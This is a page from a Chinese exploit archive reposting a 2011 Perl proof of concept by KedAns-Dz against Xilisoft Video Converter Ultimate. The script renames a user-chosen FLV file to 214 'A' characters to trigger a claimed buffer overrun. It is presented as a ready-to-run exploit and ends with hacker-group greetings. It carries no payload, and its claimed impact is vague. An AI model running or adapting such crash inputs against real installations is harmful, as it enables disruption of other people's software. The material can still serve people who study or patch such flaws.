首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xilisoft Video Converter Ultimate Buffer Overrun
来源:ked-h@hotmail.com 作者:KedAns-Dz 发布时间:2011-04-06  
#!/usr/bin/perl

###
# Title : Xilisoft Video Converter Ultimate Buffer OverRun
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Buffer OverRun
# Tested on : Windows XP Sp3 Fr 
# Target :   Xilisoft Video Converter Ultimate
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n[*] FLV name [Ex : video] >";
chomp ($song = <STDIN>);
$junk = "\x41" x 214;
# Rename The FLV Video  To Buffer Overrun : 
rename ("$song.flv", "$junk.flv");
print "\n[+] File successfully Rename! \n";
exit;

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com 
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Lotus Domino iCalendar MAI
·eXPert PDF Convert to Word v7
·Zend Server Java Bridge Arbitr
·GNU glibc < 2.12.2 'fnmatch()'
·MPlayer (r33064 Lite) Buffer O
·Encore ENPS-2012 Cross-site Sc
·Graugon Forum 1.3 SQL Injectio
·RealNetworks RealGames StubbyU
·RealNetworks RealGames StubbyU
·Wamp Webserver 2.1 File Downlo
·Movie Player 4.82 Denial Of Se
·Synergy 1.4 Protocol Cleartext
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved